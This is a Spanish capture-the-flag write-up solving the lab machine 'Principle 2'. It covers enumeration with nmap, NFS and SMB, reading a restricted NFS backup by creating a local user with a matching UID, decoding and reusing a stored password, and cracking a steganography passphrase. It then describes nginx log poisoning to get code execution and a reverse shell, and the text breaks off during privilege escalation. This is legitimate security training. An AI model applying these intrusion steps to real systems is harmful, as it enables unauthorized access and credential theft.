Principle 2

Resolvemos nuestra segunda máquina creada para la comunidad. En ella añadimos nuevos servicios que vulnerar e investigar, con un port forwarding que no podía faltar. Para terminar escalaremos privilegios abusando un servicio que ejecuta un script.

Escrito el 27/11/2023 Para no hacer el write-up muy largo y pesado voy a ir directamente al grano.

Reconocimiento de Puertos

Como es habitual, empezaremos averiguando la IP de la máquina víctima y realizando el reconocimiento de puertos con un pequeño script que creé para automatizar este proceso inicial:

sudo nmapauto

 [*] La IP de la máquina víctima es

Starting Nmap 7.94SVN ( ) at 2023-11-26 12:09 CET
Initiating ARP Ping Scan at 12:09
Scanning [1 port]
Completed ARP Ping Scan at 12:09, 0.08s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 12:09
Scanning [65535 ports]
Discovered open port 80/tcp on
Discovered open port 139/tcp on
Discovered open port 445/tcp on
Discovered open port 111/tcp on
Discovered open port 46003/tcp on
Discovered open port 54531/tcp on
Discovered open port 2049/tcp on
Discovered open port 37897/tcp on
Discovered open port 37037/tcp on
Discovered open port 45691/tcp on
Completed SYN Stealth Scan at 12:09, 4.89s elapsed (65535 total ports)
Nmap scan report for
Host is up, received arp-response (0.00015s latency).
Scanned at 2023-11-26 12:09:13 CET for 5s
Not shown: 63482 closed tcp ports (reset), 2043 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
80/tcp    open  http         syn-ack ttl 64
111/tcp   open  rpcbind      syn-ack ttl 64
139/tcp   open  netbios-ssn  syn-ack ttl 64
445/tcp   open  microsoft-ds syn-ack ttl 64
2049/tcp  open  nfs          syn-ack ttl 64
37037/tcp open  unknown      syn-ack ttl 64
37897/tcp open  unknown      syn-ack ttl 64
45691/tcp open  unknown      syn-ack ttl 64
46003/tcp open  unknown      syn-ack ttl 64
54531/tcp open  unknown      syn-ack ttl 64
MAC Address: 08:00:27:FC:D2:DF (Oracle VirtualBox virtual NIC)

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 5.10 seconds
           Raw packets sent: 67579 (2.973MB) | Rcvd: 63493 (2.540MB)

 [*] Escaneo avanzado de servicios

Starting Nmap 7.94SVN ( ) at 2023-11-26 12:09 CET
Nmap scan report for
Host is up (0.00018s latency).

80/tcp    open  http        nginx 1.22.1
|_http-title: Apache2 Debian Default Page: It works
|_http-server-header: nginx/1.22.1
111/tcp   open  rpcbind     2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100003  3,4         2049/tcp   nfs
|   100003  3,4         2049/tcp6  nfs
|   100005  1,2,3      41103/tcp6  mountd
|   100005  1,2,3      45691/tcp   mountd
|   100005  1,2,3      52842/udp   mountd
|   100005  1,2,3      56523/udp6  mountd
|   100021  1,3,4      37037/tcp   nlockmgr
|   100021  1,3,4      37649/tcp6  nlockmgr
|   100021  1,3,4      52047/udp   nlockmgr
|   100021  1,3,4      55961/udp6  nlockmgr
|   100024  1          33230/udp6  status
|   100024  1          37897/tcp   status
|   100024  1          49729/udp   status
|   100024  1          58603/tcp6  status
|   100227  3           2049/tcp   nfs_acl
|_  100227  3           2049/tcp6  nfs_acl
139/tcp   open  netbios-ssn Samba smbd 4.6.2
445/tcp   open  netbios-ssn Samba smbd 4.6.2
2049/tcp  open  nfs_acl     3 (RPC #100227)
37037/tcp open  nlockmgr    1-4 (RPC #100021)
37897/tcp open  status      1 (RPC #100024)
45691/tcp open  mountd      1-3 (RPC #100005)
46003/tcp open  mountd      1-3 (RPC #100005)
54531/tcp open  mountd      1-3 (RPC #100005)
MAC Address: 08:00:27:FC:D2:DF (Oracle VirtualBox virtual NIC)

Host script results:
|_clock-skew: 1s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2023-11-26T11:09:32
|_  start_date: N/A

Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 19.48 seconds

 [*] Escaneo completado, se ha generado el fichero InfoPuertos 

Vamos a ir revisando los puertos por orden, empezando por el 80, donde aparentemente solo sale la web por defecto de Apache2 tal y como nos indicó Nmap:


Vamos a irnos ahora al NFS, veamos qué se está compartiendo:

❯ showmount -e
Export list for
/var/backups *
/home/byron  *

Creamos unos directorios para montar estos recursos, los montamos, y vemos su contenido:

❯ mkdir backups byron
❯ sudo mount /home/kaian/labs/backups
❯ sudo mount /home/kaian/labs/byron
❯ cd byron
❯ ls
 mayor.txt   memory.txt
❯ cat memory.txt
Hermanubis told me that he lost his password and couldn't change it, thank goodness I keep a record of each neighbor with their number and password in hexadecimal. I think he would be a good mayor of the New Jerusalem.
❯ cat mayor.txt
Now that I am mayor, I think Hermanubis is conspiring against me, I guess he has a secret group and is hiding it.
❯ cd backups
cd: permiso denegado: backups

Por lo que podemos observar, byron parece ser un usuario que nos indica sus diferencias con otro, hermanubis, además nos da una pista sobre su contraseña.

De momento no tenemos acceso a backups.


Vamos a revisar ahora Samba por el 445:

❯ smbmap -H

    ________  ___      ___  _______   ___      ___       __         _______
   /"       )|"  \    /"  ||   _  "\ |"  \    /"  |     /""\       |   __ "\
  (:   \___/  \   \  //   |(. |_)  :) \   \  //   |    /    \      (. |__) :)
   \___  \    /\  \/.    ||:     \/   /\   \/.    |   /' /\  \     |:  ____/
    __/  \   |: \.        |(|  _  \  |: \.        |  //  __'  \    (|  /
   /" \   :) |.  \    /:  ||: |_)  :)|.  \    /:  | /   /  \   \  /|__/ \
  (_______/  |___|\__/|___|(_______/ |___|\__/|___|(___/    \___)(_______)
     SMBMap - Samba Share Enumerator | Shawn Evans -

[*] Detected 1 hosts serving SMB
[*] Established 1 SMB session(s)                                
[+] IP:  Name:          Status: Authenticated
  Disk                                                    Permissions Comment
  ----                                                    ----------- -------
  public                                              READ ONLY New Jerusalem Public
  chained                                             NO ACCESS Hermanubis share
  IPC$                                                NO ACCESS IPC Service (Samba 4.17.12-Debian)

Parece que solamente tenemos acceso a “public”, veamos que hay dentro:

❯ smbclient //
Password for [WORKGROUP\kaian]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Tue Nov 28 12:57:45 2023
  ..                                  D        0  Sat Nov 25 17:19:40 2023
  new_era.txt                         N      158  Sun Nov 19 13:01:00 2023
  straton.txt                         N      718  Sun Nov 19 13:00:24 2023
  loyalty.txt                         N      931  Sun Nov 19 13:01:07 2023

    19962704 blocks of size 1024. 17239712 blocks available
smb: \> mget *
Get file new_era.txt? y
getting file \new_era.txt of size 158 as new_era.txt (154,3 KiloBytes/sec) (average 154,3 KiloBytes/sec)
Get file straton.txt? y
getting file \straton.txt of size 718 as straton.txt (701,1 KiloBytes/sec) (average 427,7 KiloBytes/sec)
Get file loyalty.txt? y
getting file \loyalty.txt of size 931 as loyalty.txt (909,1 KiloBytes/sec) (average 588,2 KiloBytes/sec)
smb: \> exit

Descargados los contenidos, los leemos:

❯ cat new_era.txt
Yesterday there was a big change, new government, new mayor. All citizens were reassigned their tasks. For security, every user should change their password.
❯ cat straton.txt
This fragment from Straton's On the Universe appears to have been of great significance both to the Progenitor and to the Founder.

AMYNTAS:  But what does this tell us about the nature of the universe, which is what we were discussing?
STRATON:  That is the next question we must undertake to answer. We begin with the self because that is what determines our existence as individuals; but the self cannot exist without that which surrounds it. The citizen lives within the city; and the city lives within the cosmos. So now we must apply the principle we have discovered to the wider world, and ask: if man is like a machine, could it be that the universe is similar in nature? And if so, what follows from that fact?
❯ cat loyalty.txt
This text was the source of considerable controversy in a debate between Byron (7) and Hermanubis (452).

What I propose, then, is that we are not born as entirely free agents, responsible only for ourselves. The very core of what we are, our sentience, separates us from and elevates us above the animal kingdom. As I have argued, this is not a matter of arrogance, but of responsibility.


To put it simply: each of us owes a burden of loyalty to humanity itself, to the human project across time and space. This is not a minor matter, or some abstract issue for philosophers. It is a profound and significant part of every human life. It is a universal source of meaning and insight that can bind us together and set us on a path for a brighter future; and it is also a division, a line that must held against those who preach the gospel of self-annihilation. We ignore it at our peril.

Nos habla de cosas que aparentemente no tienen nada que ver, sin embargo, obtenemos cierta información relevante:

  • Los números asociados a cada usuario en la ciudad
  • Hubo un gran cambio en la misma y todas las contraseñas cambiaron

Vamos a tratar de revisar mejor el recurso al que no teníamos acceso por NFS:

> ls backups
lsd: backups/343.txt: Permission denied (os error 13).

lsd: backups/763.txt: Permission denied (os error 13).

lsd: backups/254.txt: Permission denied (os error 13).

lsd: backups/588.txt: Permission denied (os error 13).

lsd: backups/235.txt: Permission denied (os error 13).

lsd: backups/171.txt: Permission denied (os error 13).

❯ ls -ld backups
drwxr--r-- backup backup 28 KB Tue Nov 20 01:00:05 2023  backups
❯ \ls -ldn backups
drwxr--r-- 2 54 34 28672 nov 20 01:01 backups

Aquí lo que hemos descubierto es que no tenemos permisos, sin embargo, podemos ver el UID del propietario, que es distinto del GID.

Como tengo el comando “lsd” como alias de “ls”, por eso escapo con “\ls” con el fin de que me cargue el “ls” normal y pueda utilizar el -n para ver los UIDs.

Ahora lo que voy a realizar, es crear un usuario con ese UID para que me permita leer esos contenidos:

❯ sudo useradd pepito -u 54
useradd warning: pepito's uid 54 outside of the UID_MIN 1000 and UID_MAX 60000 range.
❯ sudo passwd pepito
Nueva contraseña: 
Vuelva a escribir la nueva contraseña: 
passwd: contraseña actualizada correctamente
❯ su pepito
$ bash
pepito@kali:/home/kaian/labs$ ls backups
0.txt  151.txt  203.txt  256.txt  308.txt  360.txt  412.txt 465.txt  517.txt  56.txt   621.txt  674.txt  726.txt  779.txt  830.txt  883.txt  935.txt  988.txt
1000.txt  152.txt  204.txt  257.txt  309.txt  361.txt  413.txt  466.txt  518.txt  570.txt  622.txt  675.txt  727.txt  77.txt   831.txt  884.txt  936.txt  989.txt
100.txt   153.txt  205.txt  258.txt  30.txt   362.txt  414.txt  467.txt  519.txt  571.txt  623.txt  676.txt  728.txt  780.txt  832.txt  885.txt  937.txt  98.txt
101.txt   154.txt  206.txt  259.txt  310.txt  363.txt  415.txt  468.txt  51.txt   572.txt  624.txt  677.txt  729.txt  781.txt  833.txt  886.txt  938.txt  990.txt
102.txt   155.txt  207.txt  25.txt   311.txt  364.txt  416.txt  469.txt  520.txt  573.txt  625.txt  678.txt  72.txt   782.txt  834.txt  887.txt  939.txt  991.txt
103.txt   156.txt  208.txt  260.txt  312.txt  365.txt  417.txt  46.txt  521.txt  574.txt  626.txt  679.txt  730.txt  783.txt  835.txt 888.txt  93.txt   992.txt
104.txt   157.txt  209.txt  261.txt  313.txt  366.txt  418.txt  470.txt  522.txt  575.txt  627.txt  67.txt   731.txt  784.txt  836.txt  889.txt  940.txt  993.txt
105.txt   158.txt  20.txt   262.txt  314.txt  367.txt  419.txt  471.txt  523.txt  576.txt  628.txt  680.txt  732.txt  785.txt  837.txt  88.txt  941.txt  994.txt
106.txt   159.txt  210.txt  263.txt  315.txt  368.txt  41.txt 472.txt  524.txt  577.txt  629.txt  681.txt  733.txt  786.txt  838.txt  890.txt  942.txt  995.txt
107.txt   15.txt   211.txt  264.txt  316.txt  369.txt  420.txt  473.txt  525.txt  578.txt  62.txt   682.txt  734.txt  787.txt  839.txt  891.txt  943.txt  996.txt
108.txt   160.txt  212.txt  265.txt  317.txt  36.txt   421.txt  474.txt  526.txt  579.txt  630.txt  683.txt  735.txt  788.txt  83.txt 892.txt  944.txt  997.txt
109.txt   161.txt  213.txt  266.txt  318.txt  370.txt  422.txt  475.txt  527.txt  57.txt   631.txt  684.txt  736.txt  789.txt  840.txt  893.txt  945.txt  998.txt
10.txt   162.txt  214.txt  267.txt  319.txt  371.txt  423.txt 476.txt  528.txt  580.txt  632.txt  685.txt  737.txt  78.txt   841.txt  894.txt  946.txt  999.txt
110.txt   163.txt  215.txt  268.txt  31.txt   372.txt  424.txt  477.txt  529.txt  581.txt  633.txt  686.txt  738.txt  790.txt  842.txt  895.txt  947.txt  99.txt
111.txt   164.txt  216.txt  269.txt  320.txt  373.txt  425.txt  478.txt  52.txt   582.txt  634.txt  687.txt  739.txt  791.txt  843.txt  896.txt  948.txt  9.txt
112.txt   165.txt  217.txt  26.txt   321.txt  374.txt  426.txt  479.txt  530.txt  583.txt  635.txt  688.txt  73.txt   792.txt  844.txt  897.txt  949.txt  alternatives.tar.0
113.txt   166.txt  218.txt  270.txt  322.txt  375.txt  427.txt  47.txt  531.txt  584.txt  636.txt  689.txt  740.txt  793.txt  845.txt 898.txt  94.txt   apt.extended_states.0
114.txt   167.txt  219.txt  271.txt  323.txt  376.txt  428.txt  480.txt  532.txt  585.txt  637.txt  68.txt   741.txt  794.txt  846.txt  899.txt  950.txt  apt.extended_states.1.gz
115.txt   168.txt  21.txt   272.txt  324.txt  377.txt  429.txt  481.txt  533.txt  586.txt  638.txt  690.txt  742.txt  795.txt  847.txt  89.txt  951.txt  apt.extended_states.2.gz
116.txt   169.txt  220.txt  273.txt  325.txt  378.txt  42.txt 482.txt  534.txt  587.txt  639.txt  691.txt  743.txt  796.txt  848.txt  8.txt 952.txt  apt.extended_states.3.gz
117.txt   16.txt   221.txt  274.txt  326.txt  379.txt  430.txt  483.txt  535.txt  588.txt  63.txt   692.txt  744.txt  797.txt  849.txt  900.txt  953.txt  apt.extended_states.4.gz
118.txt   170.txt  222.txt  275.txt  327.txt  37.txt   431.txt  484.txt  536.txt  589.txt  640.txt  693.txt  745.txt  798.txt  84.txt 901.txt  954.txt  apt.extended_states.5.gz
119.txt   171.txt  223.txt  276.txt  328.txt  380.txt  432.txt  485.txt  537.txt  58.txt   641.txt  694.txt  746.txt  799.txt  850.txt  902.txt  955.txt  apt.extended_states.6.gz
11.txt   172.txt  224.txt  277.txt  329.txt  381.txt  433.txt 486.txt  538.txt  590.txt  642.txt  695.txt  747.txt  79.txt   851.txt  903.txt  956.txt  dpkg.arch.0
120.txt   173.txt  225.txt  278.txt  32.txt   382.txt  434.txt  487.txt  539.txt  591.txt  643.txt  696.txt  748.txt  7.txt    852.txt  904.txt  957.txt  dpkg.arch.1.gz
121.txt   174.txt  226.txt  279.txt  330.txt  383.txt  435.txt  488.txt  53.txt   592.txt  644.txt  697.txt  749.txt  800.txt  853.txt  905.txt  958.txt  dpkg.arch.2.gz
122.txt   175.txt  227.txt  27.txt   331.txt  384.txt  436.txt  489.txt  540.txt  593.txt  645.txt  698.txt  74.txt   801.txt  854.txt  906.txt  959.txt  dpkg.arch.3.gz
123.txt   176.txt  228.txt  280.txt  332.txt  385.txt  437.txt  48.txt  541.txt  594.txt  646.txt  699.txt  750.txt  802.txt  855.txt 907.txt  95.txt   dpkg.arch.4.gz
124.txt   177.txt  229.txt  281.txt  333.txt  386.txt  438.txt  490.txt  542.txt  595.txt  647.txt  69.txt   751.txt  803.txt  856.txt  908.txt  960.txt  dpkg.diversions.0
125.txt   178.txt  22.txt   282.txt  334.txt  387.txt  439.txt  491.txt  543.txt  596.txt  648.txt  6.txt    752.txt  804.txt  857.txt  909.txt  961.txt  dpkg.diversions.1.gz
126.txt   179.txt  230.txt  283.txt  335.txt  388.txt  43.txt 492.txt  544.txt  597.txt  649.txt  700.txt  753.txt  805.txt  858.txt  90.txt  962.txt  dpkg.diversions.2.gz
127.txt   17.txt   231.txt  284.txt  336.txt  389.txt  440.txt  493.txt  545.txt  598.txt  64.txt   701.txt  754.txt  806.txt  859.txt  910.txt  963.txt  dpkg.diversions.3.gz
128.txt   180.txt  232.txt  285.txt  337.txt  38.txt   441.txt  494.txt  546.txt  599.txt  650.txt  702.txt  755.txt  807.txt  85.txt 911.txt  964.txt  dpkg.diversions.4.gz
129.txt   181.txt  233.txt  286.txt  338.txt  390.txt  442.txt  495.txt  547.txt  59.txt   651.txt  703.txt  756.txt  808.txt  860.txt  912.txt  965.txt  dpkg.statoverride.0
12.txt   182.txt  234.txt  287.txt  339.txt  391.txt  443.txt 496.txt  548.txt  5.txt    652.txt  704.txt  757.txt  809.txt  861.txt  913.txt  966.txt  dpkg.statoverride.1.gz
130.txt   183.txt  235.txt  288.txt  33.txt   392.txt  444.txt  497.txt  549.txt  600.txt  653.txt  705.txt  758.txt  80.txt   862.txt  914.txt  967.txt  dpkg.statoverride.2.gz
131.txt   184.txt  236.txt  289.txt  340.txt  393.txt  445.txt  498.txt  54.txt   601.txt  654.txt  706.txt  759.txt  810.txt  863.txt  915.txt  968.txt  dpkg.statoverride.3.gz
132.txt   185.txt  237.txt  28.txt   341.txt  394.txt  446.txt  499.txt  550.txt  602.txt  655.txt  707.txt  75.txt   811.txt  864.txt  916.txt  969.txt  dpkg.statoverride.4.gz
133.txt   186.txt  238.txt  290.txt  342.txt  395.txt  447.txt  49.txt  551.txt  603.txt  656.txt  708.txt  760.txt  812.txt  865.txt 917.txt  96.txt   dpkg.status.0
134.txt   187.txt  239.txt  291.txt  343.txt  396.txt  448.txt  4.txt 552.txt  604.txt  657.txt  709.txt  761.txt  813.txt  866.txt 918.txt  970.txt  dpkg.status.1.gz
135.txt   188.txt  23.txt   292.txt  344.txt  397.txt  449.txt  500.txt  553.txt  605.txt  658.txt  70.txt   762.txt  814.txt  867.txt  919.txt  971.txt  dpkg.status.2.gz
136.txt   189.txt  240.txt  293.txt  345.txt  398.txt  44.txt 501.txt  554.txt  606.txt  659.txt  710.txt  763.txt  815.txt  868.txt  91.txt  972.txt  dpkg.status.3.gz
137.txt   18.txt   241.txt  294.txt  346.txt  399.txt  450.txt  502.txt  555.txt  607.txt  65.txt   711.txt  764.txt  816.txt  869.txt  920.txt  973.txt  dpkg.status.4.gz
138.txt   190.txt  242.txt  295.txt  347.txt  39.txt   451.txt  503.txt  556.txt  608.txt  660.txt  712.txt  765.txt  817.txt  86.txt 921.txt  974.txt
139.txt   191.txt  243.txt  296.txt  348.txt  3.txt    452.txt  504.txt  557.txt  609.txt  661.txt  713.txt  766.txt  818.txt  870.txt  922.txt  975.txt
13.txt   192.txt  244.txt  297.txt  349.txt  400.txt  453.txt 505.txt  558.txt  60.txt   662.txt  714.txt  767.txt  819.txt  871.txt  923.txt  976.txt
140.txt   193.txt  245.txt  298.txt  34.txt   401.txt  454.txt  506.txt  559.txt  610.txt  663.txt  715.txt  768.txt  81.txt   872.txt  924.txt  977.txt
141.txt   194.txt  246.txt  299.txt  350.txt  402.txt  455.txt  507.txt  55.txt   611.txt  664.txt  716.txt  769.txt  820.txt  873.txt  925.txt  978.txt
142.txt   195.txt  247.txt  29.txt   351.txt  403.txt  456.txt  508.txt  560.txt  612.txt  665.txt  717.txt  76.txt   821.txt  874.txt  926.txt  979.txt
143.txt   196.txt  248.txt  2.txt    352.txt  404.txt  457.txt  509.txt  561.txt  613.txt  666.txt  718.txt  770.txt  822.txt  875.txt  927.txt  97.txt
144.txt   197.txt  249.txt  300.txt  353.txt  405.txt  458.txt  50.txt  562.txt  614.txt  667.txt  719.txt  771.txt  823.txt  876.txt 928.txt  980.txt
145.txt   198.txt  24.txt   301.txt  354.txt  406.txt  459.txt  510.txt  563.txt  615.txt  668.txt  71.txt   772.txt  824.txt  877.txt  929.txt  981.txt
146.txt   199.txt  250.txt  302.txt  355.txt  407.txt  45.txt 511.txt  564.txt  616.txt  669.txt  720.txt  773.txt  825.txt  878.txt  92.txt  982.txt
147.txt   19.txt   251.txt  303.txt  356.txt  408.txt  460.txt  512.txt  565.txt  617.txt  66.txt   721.txt  774.txt  826.txt  879.txt  930.txt  983.txt
148.txt   1.txt    252.txt  304.txt  357.txt  409.txt  461.txt  513.txt  566.txt  618.txt  670.txt  722.txt  775.txt  827.txt  87.txt 931.txt  984.txt
149.txt   200.txt  253.txt  305.txt  358.txt  40.txt   462.txt  514.txt  567.txt  619.txt  671.txt  723.txt  776.txt  828.txt  880.txt  932.txt  985.txt
14.txt   201.txt  254.txt  306.txt  359.txt  410.txt  463.txt 515.txt  568.txt  61.txt   672.txt  724.txt  777.txt  829.txt  881.txt  933.txt  986.txt
150.txt   202.txt  255.txt  307.txt  35.txt   411.txt  464.txt  516.txt  569.txt  620.txt  673.txt  725.txt  778.txt  82.txt   882.txt  934.txt  987.txt

Perfecto, ya tenemos acceso a ese directorio y podemos leer los contenidos.

pepito@kali:/home/kaian/labs/backups$ find . -name "*txt" -exec cat {} \;

Nos carga el contenido de 1000 ficheros con una sentencia en hexadecimal. Ahora, si recordamos las notas, podemos intuir que Hermanubis tiene asignado el número 452 y su contraseña podría estar en este backup de Byron, ya que él no la pudo cambiar.

pepito@kali:/home/kaian/labs/backups$ xxd -r -ps < 452.txt

Tenemos la contraseña de Hermanubis, y parece que había un recurso en SMB privado que le pertenecía:

❯ smbclient -U "hermanubis" //
Password for [WORKGROUP\hermanubis]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Tue Nov 28 15:44:44 2023
  ..                                  D        0  Sat Nov 25 18:34:50 2023
  index.html                          N      346  Tue Nov 28 15:44:41 2023
  prometheus.jpg                      N   300750  Sun Nov 19 13:07:08 2023

    19962704 blocks of size 1024. 17239676 blocks available
smb: \> mget *
Get file index.html? y
getting file \index.html of size 346 as index.html (168,9 KiloBytes/sec) (average 168,9 KiloBytes/sec)
Get file prometheus.jpg? y
getting file \prometheus.jpg of size 300750 as prometheus.jpg (97897,2 KiloBytes/sec) (average 58807,8 KiloBytes/sec)
smb: \> exit

❯ cat index.html
<!DOCTYPE html>
<html lang="es">
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Welcome to the resistance forum</title>

    <h1>Welcome to the resistance forum</h1>

    <p>free our chains!</p>

    <img src="prometheus.jpg" alt="chained">



Parece que nos está mandando un mensaje subliminal, investiguemos la foto:

❯ stegseek -wl /usr/share/wordlists/rockyou.txt prometheus.jpg
StegSeek 0.6 -

[i] Found passphrase: "soldierofanubis"  
[i] Original filename: "secret.txt".
[i] Extracting to "prometheus.jpg.out".ls
 prometheus.jpg   prometheus.jpg.out
❯ cat prometheus.jpg.out
I have set up a website to dismantle all the lies they tell us about the city: thetruthoftalos.hmv

Hemos descubierto un virtualhost, así que lo añadimos al /etc/hosts: echo " thetruhoftalos.hmv" | sudo tee -a /etc/hosts

❯ curl thetruthoftalos.hmv

Sin embargo, si cargamos el index.php ya se muestra un contenido web:

Aquí tenemos un PHP que nos carga unos ficheros por GET.

Vamos a examinarlo con Burpsuite mejor:

Log poisoning

Pues hemos descubierto un Path Traversal, así que todo apunta a un RCE con Log Poisoning. Es importante siempre tener en cuenta toda la enumeración, como curiosidad, recordemos lo que decía Nmap:

|_http-title: Apache2 Debian Default Page: It works
|_http-server-header: nginx/1.22.1

De esta forma, detectamos que podemos cargar los logs de Nginx, así que vamos a envenenar el log con un payload en el User Agent usando Burpsuite:

Y ahora probamos el payload:

Pues ya lo tenemos, vamos ahora a mandarnos una reverse shell para poder ejecutar comandos de una forma cómoda:

Ahora realizamos el tratamiento de la TTY y exploramos:

www-data@principle2:~/thetruthoftalos.hmv$ pwd
www-data@principle2:~/thetruthoftalos.hmv$ cd /home
www-data@principle2:/home$ ls -l
total 20
drwxr-xr-x 3 byron      byron      4096 Nov 25 17:33 byron
drwxr-xr-x 2 root       root       4096 Nov 28 11:57 city
drwx------ 3 hermanubis hermanubis 4096 Nov 25 17:34 hermanubis
drwx------ 3 melville   melville   4096 Nov 26 11:38 melville
drwxr-xr-x 3 talos      talos      4096 Nov 25 17:33 talos
www-data@principle2:/home$ cd talos
www-data@principle2:/home/talos$ ls
www-data@principle2:/home/talos$ find / -name "user.txt" 2>/dev/null

Aquí incluso habiendo creado la máquina me quedé 2 minutos un poco descolocado 🤣, ¿dónde puse la flag?. Como siempre, si pensamos un poco, que no figure al buscarla quiere decir que no tenemos permiso para leerla, por tanto si recordamos, tenemos una contraseña de hermanubis de Samba, así que lo más obvio sería reutilización de credenciales…

www-data@principle2:~/home$ su hermanubis
$ bash
hermanubis@principle2:/home$ cd hermanubis/
hermanubis@principle2:~$ ls
investigation.txt  share  user.txt
hermanubis@principle2:~$ cat user.txt 
                 ..,;:;,,,:ldl'   .kWMMMWXXNWMMMMXd..':d0XWWN0d:;lkd,
               ..,;;,,'':loc.     lKMMMNl. .c0KNWNK:  ..';lx00X0l,cxo,.
             ..''....'cooc.       c0NMMX;   .l0XWN0;       ,ddx00occl:.
           ..'..  .':odc.         .x0KKKkolcld000xc.       .cxxxkkdl:,..
         ..''..   ;dxolc;'         .lxx000kkxx00kc.      .;looolllol:'..
        ..'..    .':lloolc:,..       'lxkkkkk0kd,   ..':clc:::;,,;:;,'..
        ......   ....',;;;:ccc::;;,''',:loddol:,,;:clllolc:;;,'........
            .     ....'''',,,;;:cccccclllloooollllccc:c:::;,'..


The flag is:

Ya tenemos la flag de user, así que toca escalar privilegios, leamos ese txt:

hermanubis@principle2:~$ cat investigation.txt 
I am aware that Byron hates me... especially since I lost my password.
My friends along with myself after several analyses and attacks, we have detected that Melville is using a 32 character password....
What he doesn't know is that it is in the Byron database...

Remote port forwarding

Pues básicamente nos está indicando que la contraseña de Melville está en los ficheros que vimos al principio, así que vamos a revisar cómo poder aplicar fuerza bruta:

hermanubis@principle2:~$ ss -tunel
Failed to open cgroup2 by ID
Failed to open cgroup2 by ID
Failed to open cgroup2 by ID
Failed to open cgroup2 by ID
Failed to open cgroup2 by ID
Failed to open cgroup2 by ID
Netid   State    Recv-Q   Send-Q     Local Address:Port      Peer Address:Port  Process                                                                         
udp     UNCONN   0        0         *      ino:16066 sk:1 cgroup:/system.slice/ifup@enp0s3.service <->                    
udp     UNCONN   0        0        *      ino:12778 sk:2 cgroup:/system.slice/rpcbind.socket <->                         
udp     UNCONN   0        0      *      ino:16122 sk:3 cgroup:/system.slice/nfs-mountd.service <->                     
udp     UNCONN   0        0      *      ino:16612 sk:4 cgroup:unreachable:7c6 <->                                      
udp     UNCONN   0        0  *      ino:17422 sk:5 cgroup:/system.slice/nmbd.service <->                           
udp     UNCONN   0        0   *      ino:17421 sk:6 cgroup:/system.slice/nmbd.service <->                           
udp     UNCONN   0        0        *      ino:16802 sk:7 cgroup:/system.slice/nmbd.service <->                           
udp     UNCONN   0        0  *      ino:17424 sk:8 cgroup:/system.slice/nmbd.service <->                           
udp     UNCONN   0        0   *      ino:17423 sk:9 cgroup:/system.slice/nmbd.service <->                           
udp     UNCONN   0        0        *      ino:16803 sk:a cgroup:/system.slice/nmbd.service <->                           
udp     UNCONN   0        0      *      ino:16110 sk:b cgroup:/system.slice/nfs-mountd.service <->                     
udp     UNCONN   0        0      *      ino:16097 sk:c cgroup:/system.slice/nfs-mountd.service <->                     
udp     UNCONN   0        0      *      uid:103 ino:16173 sk:d cgroup:/system.slice/rpc-statd.service <->              
udp     UNCONN   0        0      *      ino:16157 sk:e cgroup:/system.slice/rpc-statd.service <->                      
udp     UNCONN   0        0                   [::]:51199             [::]:*      ino:16128 sk:f cgroup:/system.slice/nfs-mountd.service v6only:1 <->            
udp     UNCONN   0        0                   [::]:39988             [::]:*      ino:16116 sk:10 cgroup:/system.slice/nfs-mountd.service v6only:1 <->           
udp     UNCONN   0        0                   [::]:111               [::]:*      ino:12784 sk:11 cgroup:/system.slice/rpcbind.socket v6only:1 <->               
udp     UNCONN   0        0                   [::]:36192             [::]:*      uid:103 ino:16179 sk:12 cgroup:/system.slice/rpc-statd.service v6only:1 <->    
udp     UNCONN   0        0                   [::]:55869             [::]:*      ino:16614 sk:13 cgroup:unreachable:7c6 v6only:1 <->                            
udp     UNCONN   0        0                   [::]:36511             [::]:*      ino:16104 sk:14 cgroup:/system.slice/nfs-mountd.service v6only:1 <->           
tcp     LISTEN   0        4096   *      ino:16125 sk:15 cgroup:/system.slice/nfs-mountd.service <->                    
tcp     LISTEN   0        4096   *      uid:103 ino:16176 sk:16 cgroup:/system.slice/rpc-statd.service <->             
tcp     LISTEN   0        4096   *      ino:16101 sk:17 cgroup:/system.slice/nfs-mountd.service <->                    
tcp     LISTEN   0        4096   *      ino:16113 sk:18 cgroup:/system.slice/nfs-mountd.service <->                    
tcp     LISTEN   0        50       *      ino:17493 sk:19 cgroup:/system.slice/smbd.service <->                          
tcp     LISTEN   0        128      *      ino:16671 sk:1a cgroup:/system.slice/ssh.service <->                           
tcp     LISTEN   0        50       *      ino:17494 sk:1b cgroup:/system.slice/smbd.service <->                          
tcp     LISTEN   0        64     *      ino:16613 sk:1c cgroup:unreachable:7c6 <->                                     
tcp     LISTEN   0        64      *      ino:16588 sk:1d cgroup:unreachable:7c6 <->                                     
tcp     LISTEN   0        511       *      ino:16648 sk:1e cgroup:/system.slice/nginx.service <->                         
tcp     LISTEN   0        4096     *      ino:12775 sk:1f cgroup:/system.slice/rpcbind.socket <->                        
tcp     LISTEN   0        4096                [::]:39657             [::]:*      ino:16119 sk:20 cgroup:/system.slice/nfs-mountd.service v6only:1 <->           
tcp     LISTEN   0        4096                [::]:42729             [::]:*      ino:16107 sk:21 cgroup:/system.slice/nfs-mountd.service v6only:1 <->           
tcp     LISTEN   0        4096                [::]:56841             [::]:*      uid:103 ino:16182 sk:22 cgroup:/system.slice/rpc-statd.service v6only:1 <->    
tcp     LISTEN   0        4096                [::]:44553             [::]:*      ino:16131 sk:23 cgroup:/system.slice/nfs-mountd.service v6only:1 <->           
tcp     LISTEN   0        50                  [::]:445               [::]:*      ino:17491 sk:24 cgroup:/system.slice/smbd.service v6only:1 <->                 
tcp     LISTEN   0        64                  [::]:41221             [::]:*      ino:16615 sk:25 cgroup:unreachable:7c6 v6only:1 <->                            
tcp     LISTEN   0        128                 [::]:345               [::]:*      ino:16704 sk:26 cgroup:/system.slice/ssh.service v6only:1 <->                  
